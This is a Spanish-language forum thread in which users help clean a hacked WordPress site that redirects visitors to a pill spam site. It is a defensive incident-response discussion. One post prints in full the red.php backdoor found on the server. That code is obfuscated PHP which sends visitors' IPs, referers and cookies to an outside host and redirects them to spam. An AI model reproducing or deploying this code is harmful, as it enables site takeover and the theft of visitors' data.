Título: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 18:59 pm Hola gente, les hago una consulta.
Una amiga me comentó que le hackearon su sitio web. Al parecer toda su web redireccionaba a una página de Pastillas (viagra, etc...). Ella se comunicó no recuerdo con quién y le han dicho que tiene el siguiente Malware: Malware denominado Seo-Spam en tu Web. SEO Spam MW:SPAM:SEO Código: http://www.misitio.com.ar/404testpage4525d2fdc Código: http://www.misitio.com.ar/404javascript.js Estuve googleando un poco pero no tengo idea. A alguien le pasó esto? Como puedo solucionarlo o que debo borrar para que no suceda más la redirección. Desde ya muchisimas gracias!!! Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 19:08 pm ¿No tiene acceso al servidor en el que tiene montado el wordpress? Redirects se pueden hacer de varias formas, desde un archivo.html o creando una regla de mod_rewrite del apache. Si no tiene acceso al servidor que se ponga en contacto con el admin y que este le restaure la cuenta y le borre las redirecciones y los archivos.
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 19:16 pm ¿No tiene acceso al servidor en el que tiene montado el wordpress? Redirects se pueden hacer de varias formas, desde un archivo.html o creando una regla de mod_rewrite del apache. Si no tiene acceso al servidor que se ponga en contacto con el admin y que este le restaure la cuenta y le borre las redirecciones y los archivos. Acceso al servidor tengo, me ha pasado todo, pero de ahí no sabría que más tocar. me podrías guiar un poco más?? Desde ya muchas gracias por tu tiempo! Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 19:29 pm Revisa por el .htaccess a ver si tienes una regla que vaya a la pagina en cuestión:
Algo así como: Código: RewriteRule .* http://safemedpillmarket.com También podría ser que tengan las redirecciones desde el apache.conf. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 19:53 pm Revisa por el .htaccess a ver si tienes una regla que vaya a la pagina en cuestión: Algo así como: Código: RewriteRule .* http://safemedpillmarket.com También podría ser que tengan las redirecciones desde el apache.conf. Ya mismo me fijo. Me ha dicho mi amiga que me mandó los accesos, y todavía no veo nada. Lo siento por la demora ¬¬. En el caso de encontrarlo, debo borrar completa esa línea o debo sustituir la web que me figura, por la mía? Muchas gracias de nuevo! Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 19:58 pm Si ves una linea parecida primero intenta por cambiarle la dirección a la principal, si te redirecciona a la principal borrala.
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 20:16 pm Si ves una linea parecida primero intenta por cambiarle la dirección a la principal, si te redirecciona a la principal borrala. Minus, al parecer en el .htaccess no hay nada de lo que me has dicho. ME HACE DUDAR LAS PRIMERAS 10 LINEAS. Hay algo mal en eso?. Te lo dejo aquí igualmente. Código: {\rtf1\ansi\ansicpg1252\cocoartf1038\cocoasubrtf360 Con respecto al archivo apache.conf no lo he encontrado donde estaba el .htaccess, estará en otro lugar? Cada vez me ahogo más en esto :( Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 20:27 pm Bueno pues, lo que pasa es que editaron el archivo con un editor de texto para darle formato, como word u oppenoffice. No veo nada raro en el .htaccess. ¿Tienes acceso a todo el servidor o solo al FTP? Si no tienes acceso al servidor y estás pagando a alguien, bien puede ser que todos los sitios alojados en ese servidor esten siendo redireccionados ahí.
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 20:33 pm Bueno pues, lo que pasa es que editaron el archivo con un editor de texto para darle formato, como word u oppenoffice. No veo nada raro en el .htaccess. ¿Tienes acceso a todo el servidor o solo al FTP? Si no tienes acceso al servidor y estás pagando a alguien, bien puede ser que todos los sitios alojados en ese servidor esten siendo redireccionados ahí. Gracias nuevamente por tu tiempo Minus, las primeras 10 lineas del .htaccess yo las ví "raras" pero si tu me dices que eso está Ok, entonces lo dejo así. Con respecto a lo que preguntaste, Sí, tengo acceso al servidor, pero no se a donde dirigirme o qué modificar para reparar el problema. Veo lo siguiente: (http://s1.postimg.org/awauxmoof/minus.jpg) Y con respecto a lo otro que preguntabas, mi amiga ha hablado con la empresa del servidor y le han dicho lo que puse en el primer post, que la web está infectada y le pasaron esto: Citar Malware denominado Seo-Spam en tu Web. SEO Spam MW:SPAM:SEO Código: http://www.wilboradalibros.com.ar/404testpage4525d2fdc Código: http://www.wilboradalibros.com.ar/404javascript.js Que solo es esta web, que no es problema de ellos ya que las otras están bien. Algo nuevo para hacer?? MUCHAS GRACIAS!! Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 24 Julio 2014, 20:47 pm El "malware" al parecer solo afecta a las redirecciones 404. Archivos normales funcionan bien.
Código: http://www.wilboradalibros.com.ar/readme.html Me he fijado que existe un index.php pero esta vacio. Podrías mirar a ver si tiene algo sospechoso ? Aparte, intenta buscar algún archivo que tenga error404 o 404 o algo así en el nombre.. si existe, muestra a ver cual es su contenido. PD: Las urls ponlas entre etiquetas geshi para evitar que otros usuarios las visiten sin querer. Edit: Código: http://www.wilboradalibros.com.ar/wp-login.php Lanza errores PHP que dicen que no puede modificar los headers. Apunta a la linea 154 en /wp-includes/functions.wp-scripts.php Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 21:00 pm El "malware" al parecer solo afecta a las redirecciones 404. Archivos normales funcionan bien. Código: http://www.wilboradalibros.com.ar/readme.html Me he fijado que existe un index.php pero esta vacio. Podrías mirar a ver si tiene algo sospechoso ? Aparte, intenta buscar algún archivo que tenga error404 o 404 o algo así en el nombre.. si existe, muestra a ver cual es su contenido. PD: Las urls ponlas entre etiquetas geshi para evitar que otros usuarios las visiten sin querer. Edit: Código: http://www.wilboradalibros.com.ar/wp-login.php Lanza errores PHP que dicen que no puede modificar los headers. Apunta a la linea 154 en /wp-includes/functions.wp-scripts.php Saludos #!drvy MUCHAS GRACIAS por tu tiempo. Miré el archivo .php y está completamente vacío. Lo que no entendí es tus últimas 2 líneas que debo hacer con la línea 154. Podrías aclararmelo? Nuevamente muchas gracias!! EDIT: La línea 154, tiene esto: Código
Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 21:03 pm Mas bien afecta a las direcciones no fisicas:
Ninguna de las paginas de google me funcionan: https://www.google.com/#q=site:wilboradalibros.com.ar Pero archivos y carpetas de verdad si: Código: http://wilboradaslibros.com.ar/wp-admin/ Por cierto estos errores le salian a la dueña antes? Código: Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154 Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 21:07 pm Mas bien afecta a las direcciones no fisicas: Ninguna de las paginas de google me funcionan: https://www.google.com/#q=site:wilboradalibros.com.ar Pero archivos y carpetas de verdad si: Código: http://wilboradaslibros.com.ar/wp-admin/ Por cierto estos errores le salian a la dueña antes? Código: Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154 Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location. No eso no le salía. Siempre me dijo que se le redireccionaba su web sin ver errores. Que complicado se está volviendo esto :(. PD: Arriba edite el post y puse el código de la línea 154 que comentaba #!drvy Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 21:19 pm ¿Puedes poner lo que dice en:
wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos. Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 21:29 pm ¿Puedes poner lo que dice en: wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos. Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress. De la 875 a 902 dice es esto: (Te lo paso completo para que no quede en partes) Código
A partir del primer setcookie sería 883 la línea. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 21:39 pm He puesto a funcionar desde el Wordpress mismo un Anti-Malware y me ha encontrado el siguiente backdoor en el archivo 404.php de wp-content/themes
(http://s30.postimg.org/s3wove3up/virus.jpg) Cuando me dirigi a la ruta para verlo, lo que tenía ese archivo era esto: Código
BORRÉ EL ARCHIVO, pero intenté acceder a la web y sigue redireccionandosé!! :( Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 21:48 pm Eso es base 64 y se traduce a:
Código
Seguro que no había nada raro en el index.php? Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 24 Julio 2014, 21:52 pm En realidad ese script ha hecho su trabajo xD
Código: http://lamirona.aler.org/index.txt ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ? Saludos Título: Re: Mi Wordpress Hackeado Publicado por: EFEX en 24 Julio 2014, 21:56 pm Yo miraria en wp-includes que archivos fueron los ultimos en ser modificados.
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 21:56 pm En realidad ese script ha hecho su trabajo xD Código: http://lamirona.aler.org/index.txt ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ? Saludos Este es el reporte precisamente: (http://s18.postimg.org/j153dh4o9/virus2.jpg) Gracias por responder tan rápido y dedicarle su tiempo a mi ayuda. Creo que estamos cerca... :) Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 24 Julio 2014, 22:08 pm Hmmm si fuese algun include, no deberia afectar a todas las paginas ? Incluidas las de wordpress.. sin embargo solo afecta (a mi ver) las que utilizan un tema.. y el archivo 404 ese estaba dentro de un tema..
ka0s podrias cambiar el theme al de por defecto a ver si le afecta tambien.. y si es posible, empaquetar el tema en un .zip y subirlo a algun lado para que podamos descargarlo ? Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 22:11 pm Yo pense que no habías encontrado nada raro en el index.php, no que no hubieras encontrado nada en el index.php!
Puedes empezar por restaurar ese archivo. :P Y alguien tuvo que haber llamado a ese archivo para hacerle el: Código Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 22:18 pm Hmmm si fuese algun include, no deberia afectar a todas las paginas ? Incluidas las de wordpress.. sin embargo solo afecta (a mi ver) las que utilizan un tema.. y el archivo 404 ese estaba dentro de un tema.. ka0s podrias cambiar el theme al de por defecto a ver si le afecta tambien.. y si es posible, empaquetar el tema en un .zip y subirlo a algun lado para que podamos descargarlo ? Saludos Acá esta el Theme como pedías: http://ge.tt/8Df8qIp1/v/0?c He cambiado el tema por otro que estaba ahi (el default de Wordpress no se encontraba) pero la web sigue redireccionando. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 22:22 pm Yo pense que no habías encontrado nada raro en el index.php, no que no hubieras encontrado nada en el index.php! Puedes empezar por restaurar ese archivo. :P Y alguien tuvo que haber llamado a ese archivo para hacerle el: Código El archivo index.php que se encuentra en public_html ESTÁ VACIO. El archivo index.php que se encuentra en wp-content/themes/wilborada1 tiene el siguiente contenido: Código
Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 22:28 pm Lo que quise decir es que puedes restaurar el archivo index.php, en el directorio principal. Te bajas la versión de wordpress que instalaste y subes el archivo index.php que esta en el directorio raiz de wordpress.
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 22:34 pm Lo que quise decir es que puedes restaurar el archivo index.php, en el directorio principal. Te bajas la versión de wordpress que instalaste y subes el archivo index.php que esta en el directorio raiz de wordpress. Hice lo que me dijiste, baje el Wordpress, y le puse el archivo index.php que contenía este codigo: Código
Pero no he visto ninguna diferencia :huh: Gracias Minus por seguir ayudando!! Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 24 Julio 2014, 22:38 pm El tema que pusiste no tiene ninguna redireccion (al menos no vi) ni nada sospechoso a excepción de 2 archivos:
1.txt Código: www.wilboradalibros.com.ar/wp-content/themes/wilborada1/1.txt Y wp-query.php que parece un mailer y hace uso de 1.txt. Va a ser que esta en los includes xD... podrias subir los archivos de esa carpeta (wp-includes) ? Aunque parece que la instalación esta tan tocada, que es mejor borrar y volver a instalar. Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 22:57 pm ¿Por cierto, si estaban usando urls con el mod_rewrite donde están las reglas de wordpress en el .htaccess?
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 23:01 pm ¿Por cierto, si estaban usando urls con el mod_rewrite donde están las reglas de wordpress en el .htaccess? Aqui me has dejado en blanco. No se cuales son las reglas que debe usar wordpress en el .htaccess. Si sabes que debo agregar, dimelo y lo agrego. El tema que pusiste no tiene ninguna redireccion (al menos no vi) ni nada sospechoso a excepción de 2 archivos: 1.txt Código: www.wilboradalibros.com.ar/wp-content/themes/wilborada1/1.txt Y wp-query.php que parece un mailer y hace uso de 1.txt. Va a ser que esta en los includes xD... podrias subir los archivos de esa carpeta (wp-includes) ? Aunque parece que la instalación esta tan tocada, que es mejor borrar y volver a instalar. Saludos Aqui está subido el WP-INCLUDES: http://ge.tt/7P2jzIp1/v/0?c Veremos si hay algo ahí entonces. Otra persona me ha dicho que quizas por inyección en los comentarios puede estar el problema. Pero no creo, confio más en ustedes que al parecer de a poco nos vamos acercando al problema. MUCHAS GRACIAS! Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 24 Julio 2014, 23:13 pm Borra el archivo red.php de wp-includes. Es un claro malware.
Sigo analizando por si hay otros. Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 23:25 pm Borra el archivo red.php de wp-includes. Es un claro malware. Sigo analizando por si hay otros. Saludos Borrado el archivo red.php. Sigo aqui a la espera, y ya lo dije mil veces pero lo sigo diciendo igual. GRACIAS! Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 24 Julio 2014, 23:47 pm Compare tus wp-include con los wp-include de la version de 3.9.1 directamente de la pagina de wordpress con diff y solo encontre esto:
Código: Only in wp-includes: red.php De modo que si no era el red.php no creo que haya algo más. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 24 Julio 2014, 23:50 pm Me he dado cuenta que el archivo red.php ESTÁ EN TODAS LAS CARPETAS.
WP-CONTENT, WP-INCLUDES, PORTADA. Estas seguro que es Malware? El contenido es este: Código: <?$tds="http://fbt.yahoo.com/counter.php";$password="fff123106f3430";$g="http://pills-shop.ru";$esdid="counter3";$key="zzzzgb54y45yb45tktbwtberheh6e4wh";?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3');$p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f','0',$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo'{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<sizeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c, $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=substr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen(' '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTTP_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HTTP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT']);foreach($_COOKIE as $key=>$n) {$tt=$tt."&".$key."=".$n;}$tt=urlencode($tt);if(empty($tt)){$tt=urlencode($_SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom=".$h."&ref=".$m."&ip=".$p."&prox=".$e."&agent=".$r."&cookie=".$tt."&esdid=".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite($d, $y); while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty($q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);} $w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found');header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("&", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}If($w[0]=='echo'){echo $x;}?> Perdon que dude, pero me genero esa duda cuando ví que estaba en varias carpetas. Lo borro de todos lados entonces? Compare tus wp-include con los wp-include de la version de 3.9.1 directamente de la pagina de wordpress con diff y solo encontre esto: Código: Only in wp-includes: red.php De modo que si no era el red.php no creo que haya algo más. Entonces esto responde a lo que acabo de escribir arriba no?. Borro todos los red.php que vea y pruebo la web? Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 00:00 am ¿Todos los red.php son iguales? Hasta no verlos todos, no los elimines. Juntalos todos y subelos.
Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 00:05 am Solo con ver
Código: $g="http://pills-shop.ru"; Ya sabes lo que hay xD Slaudos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 00:17 am Gracias a los 2!!
Ya he borrado todo los red.php (todos eran iguales) Y si entras a la web que pusiste arriba, redirecciona a la de PHARMACY tal como pasaba en la web. Veré si activo mi web, que sucede ahora. Los mantengo al tanto en mi próxima respuesta!! EDITO: Ya he ingresado a la web http://www.wilboradalibros.com.ar/ pero absolutamente TODOS LOS LINKS que clickeo, me llevan a la web de las píldoras :( :( :( Qué más tendremos que hacer ahora? :( Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 00:25 am A mi no me aparece tu página, me sigue cargando la pagina inicial y eso de las pildoras en los links lo he leido en alguna parte, creo que era un plugin.
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 00:30 am A mi no me aparece tu página, me sigue cargando la pagina inicial y eso de las pildoras en los links lo he leido en alguna parte, creo que era un plugin. Actualiza muchas veces, yo matuve apretado F5 2 o 3 segundos y luego me cargó bien la web. Deberías verla. Eso si, los links como dije, siguen redireccionando a la p**a página de pildoras :( Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 00:44 am Todavia no me aparece. Tengo la cache deshabilitada con 0 cookies y como quiera me sigue cargando la pagina de safemedpills si acceso a cualquier otra dirección.
Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 00:45 am se a mi tambien xD El index ha cambiado pero lo demas no.
Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 00:48 am se a mi tambien xD El index ha cambiado pero lo demas no. Saludos Me estoy volviendo loco. En Firefox me accede a la web perfectamente y en IE visualizo que se está renovando blablabla. Ya estoy tan mareado. Como sigo??? :S Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 00:57 am Desactiva todos los plugins. Busca otros .htaccess. Si tienes una terminal, intenta
Código
Sobre el public_html. Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 01:00 am Desactiva todos los plugins. Busca otros .htaccess. Si tienes una terminal, intenta Código
Sobre el public_html. Saludos Al parecer no tengo terminal. Ya he desactivado todos los plugins y no, no tengo otros .htaccess Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 01:04 am Pues.. como no metas todo el wordpress en un .zip xD La idea es descargarlo y buscar archivos que contengan cosas sospechosas.. En windows el buscador de archivos también sirve.
Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 01:09 am Pues.. como no metas todo el wordpress en un .zip xD La idea es descargarlo y buscar archivos que contengan cosas sospechosas.. En windows el buscador de archivos también sirve. Saludos Uff, me tardaré un poco en hacer un zip de la web. Denme tiempo. Por lo pronto no se como hacer o que modificar para que ustedes puedan visualizar la web. Yo la veo en Firefox pero en IE me aparece "nos estamos renovando blablabla" (El aviso que ha puesto mi amiga cuando se la hackearon) Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 01:20 am Uff, me tardaré un poco en hacer un zip de la web. Denme tiempo. Por lo pronto no se como hacer o que modificar para que ustedes puedan visualizar la web. Yo la veo en Firefox pero en IE me aparece "nos estamos renovando blablabla" (El aviso que ha puesto mi amiga cuando se la hackearon) Quiero creer que es el R=301 del .htaccess que pusiste. ¿Por cierto como has abierto el archivo .htaccess? ¿Desde notepad? No veo como apache puede estar ignorando todo ese formato innecesario. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 01:31 am Quiero creer que es el R=301 del .htaccess que pusiste. ¿Por cierto como has abierto el archivo .htaccess? ¿Desde notepad? No veo como apache puede estar ignorando todo ese formato innecesario. Lo he abierto desde Notepad++. Y no entendi lo de R=301. Vuelvo a poner aqui el codigo del .htaccess. Código: {\rtf1\ansi\ansicpg1252\cocoartf1038\cocoasubrtf360 Están seguros que quieren el zip del Wordpress? Faltan pasarse 988.000.000 archivos del FTP a mi PC :o :o :o Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 01:36 am Citar Faltan pasarse 988.000.000 archivos del FTP a mi PC -________- No pues todo menos la carpeta de uploads xD Ah.. y antes de subir el zip, modifica el wp-settings.php para no mostrar tus datos de acceso. Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 01:39 am Yo hablo de está linea:
Código: RewriteRule ^(.*)$ http://\cf4 \cb5 wilborada.com.ar\cf2 \cb3 /$1 [R=301,L]\ Porque si le hago un wget a tu index.php. Código: HTTP request sent, awaiting response... 301 Moved Permanently Y como dice #!drvy no copies las cosas de tu amiga, solo las cosas del wordpress. Nada de los libros... Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 01:47 am Parece que no es eso, y creo que tiene sentido porque tu la puedes ver y nosotros no xD.
Guarda el archivo .htaccess asi: Código
Algunas cosas no encajan eh. Edit: MUCHAS COSAS NO ENCAJAN XD Edit: #!drvy no me di cuenta que hice doble post si puedes juntar mis posts mejor XD. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 01:54 am Parece que no es eso, y creo que tiene sentido porque tu la puedes ver y nosotros no xD. Guarda el archivo .htaccess asi: Código
Algunas cosas no encajan eh. Edit: #!drvy no me di cuenta que hice doble post si puedes juntar mis posts mejor XD. Guardé el archivo .htaccess como tu lo has dicho y lo volví a subir. Pero creo que nada ha cambiado. En IE me aparece "Estamos renovando" y en Firefox veo la web. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 01:58 am Me di cuenta que ahora cuando clickeo en la web principal CUALQUIER LINK no dirige más a la p**a página de pildoras pero tampoco a las correctas.
Ahora lo que aparece es Citar Not Found The requested URL /nosotros was not found on this server. Espero que no la estemos cagando Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 02:12 am No creo que se esten ejecutando ninguna de las reglas ahí, pero creo que si sobrescrbiste el .htaccess de wordpress. Intenta meterte al panel y vuelve a guardar la configuración de los permalinks a ver si esto te crea un nuevo archivo .htaccess
Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 02:14 am Buenas, ka0s de buena fe me dejo acceder al servidor FTP y he hecho una busqueda y creo que no queda ningun red.php ni nada que lleve pills.ru xD
@ka0s, el htaccess lo tienes como _.htaccess. Por eso, apache no lo toma en cuenta. El problema es que si lo activo (lo he probado) el servidor tira 500 Internal Server Error. En principio parece que nos hemos librado del malware ahora el problema es volver a configurar wordpress para sus urls amigables. El htaccess es el mismo que dejo MinusFour.. debe tener algun problema voy a revisar el error.log Saludos Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 02:23 am Buenas, ka0s de buena fe me dejo acceder al servidor FTP y he hecho una busqueda y creo que no queda ningun red.php ni nada que lleve pills.ru xD @ka0s, el htaccess lo tienes como _.htaccess. Por eso, apache no lo toma en cuenta. El problema es que si lo activo (lo he probado) el servidor tira 500 Internal Server Error. En principio parece que nos hemos librado del malware ahora el problema es volver a configurar wordpress para sus urls amigables. El htaccess es el mismo que dejo MinusFour.. debe tener algun problema voy a revisar el error.log Saludos El .htaccess no tiene mucho sentido la verdad. Muchas directivas Allow, Deny pero están al aire. Por ejemplo si quiere protejer el fichero .htaccess debe hacer: Código
Al final hay una directiva de Allow así que no debería haber problema pero quien sabe si se tome en cuenta esa directiva. Lo mismo con el wpconfig.php. Edit: Si vuelves a guardar la configuración de permalinks te vuelve a hacer el .htaccess (si tiene permisos para hacerlo). Citar To recreate your .htaccess file visit your permalinks setting and save them again. That should create for you a new file or at least tell you exactly what to put into that file. http://your-blog-url-here/wp-admin/options-permalink.php Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 02:31 am @ka0s, al parecer nosotros no vemos el WP porque esta activado el modo mantenimiento. Aparte, el .htaccess creo que lo puedes reconstruir desde Wordpress (como menciono MinusFour xD).
Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 02:33 am Gracias a los dos.
La verdad yo no se como proceder ahora. Buenísimo que al parecer el Malware se quito, pero ni p**a idea como volver los links correctamente. No será que eso falló por desactivar los plugins? (Lo siento si es que estoy preguntando cualq cosa). Avisenme si necesitan, o desean que pruebe o haga algo. Sobre todo vos #!drvy que estás trabajando en el FTP. Con respecto al Modo Mantenimiento, voy a buscarlo en el Panel de Administracion si encuentro algo para quitarlo y probar de esa forma **EDITO** YA SE REPARARON LOS LINKS!!!!! Lo que no entendi es lo que dijeron de Mantenimiento, no se de donde quitar eso para que no lo vean. Y no se porque el formulario de contacto no está más -_- Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 02:42 am ¿Los links apuntan a la pagina de las pildoras? ¿O apuntan a la pagina que corresponde y está te lleva a la pagina de las pastillas? Por lo menos pegame el HTML de la pagina XD!
Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 02:44 am ¿Los links apuntan a la pagina de las pildoras? ¿O apuntan a la pagina que corresponde y está te lleva a la pagina de las pastillas? Por lo menos pegame el HTML de la pagina XD! Justo edite el post arriba. No, todo ahora apunta correctamente. YA SE REPARARON LOS LINKS!!!!! Lo que no entendi es lo que dijeron de Mantenimiento, no se de donde quitar eso para que no lo vean. Y no se porque el formulario de contacto no está más -_- Y ahora lo primero y principal, alguien puede aclarar como paso lo de red.php, como llego ahí?? Es falla de la web? falla de mi amiga y su pc infectada? No volverá a suceder? Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 02:48 am Preguntale a tu amiga, ella debio de haber puesto eso.
Y en cuanto a lo de si volvera a suceder, es probable. Hay muchos plugins que te pueden afectar, sin mencionar aquellos que estan disfrazados para joderte. Lo ideal sería minimizar código externo al oficial de wordpress a menos que lo estes haciendo tú y sepas lo que haces. Título: Re: Mi Wordpress Hackeado Publicado por: #!drvy en 25 Julio 2014, 02:51 am Buenas, parece que la web ya esta bien =)
Tema de como se infecto.. Parece que Wordpress esta en su ultima version (3.9.1) y no creo que sea por el ( a no ser que los atacantes tuviesen un 0-day). Me parece que es cosa de algún plugin o bien de la débil contraseña que tiene tu amiga. Me he descargado el access-log.txt y estoy revisando a ver si encuentro algo relevante aunque son 37 megas xDD PD: El formulario de contacto no esta, porque es un plugin y lo tienes desactivado xD. Saludos Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 02:54 am Buenas, parece que la web ya esta bien =) Tema de como se infecto.. Parece que Wordpress esta en su ultima version (3.9.1) y no creo que sea por el ( a no ser que los atacantes tuviesen un 0-day). Me parece que es cosa de algún plugin o bien de la débil contraseña que tiene tu amiga. Me he descargado el access-log.txt y estoy revisando a ver si encuentro algo relevante aunque son 37 megas xDD PD: El formulario de contacto no esta, porque es un plugin y lo tienes desactivado xD. Saludos Ah lo siento por la pregunta idiota que hice y gracias por aclararmela! Con respecto a lo que dices de Wordpress. AHORA se encuentra en la 3.9.1 porque lo he actualizado yo, pero cuando sucedió esto tenía una versión vieja. Quizás ya no suceda más ahora que esta todo borrado y actualizado el Wordpress. Con respecto a lo de Manteinience pudiste encontrarlo y quitarlo? Tu Minusfour ya puedes visualizar la web?? Título: Re: Mi Wordpress Hackeado Publicado por: MinusFour en 25 Julio 2014, 02:58 am Buenas, parece que la web ya esta bien =) Tema de como se infecto.. Parece que Wordpress esta en su ultima version (3.9.1) y no creo que sea por el ( a no ser que los atacantes tuviesen un 0-day). Me parece que es cosa de algún plugin o bien de la débil contraseña que tiene tu amiga. Me he descargado el access-log.txt y estoy revisando a ver si encuentro algo relevante aunque son 37 megas xDD PD: El formulario de contacto no esta, porque es un plugin y lo tienes desactivado xD. Saludos Haz un grep red.php?mode=setconfig o grep red.php?mode=config, a ver si hay entradas recientes alrededor de ahí. Todavia no puedo ver la pagina, me sale en blanco :/. Si, me esta devolviendo un error 500. Título: Re: Mi Wordpress Hackeado Publicado por: ka0s en 25 Julio 2014, 03:02 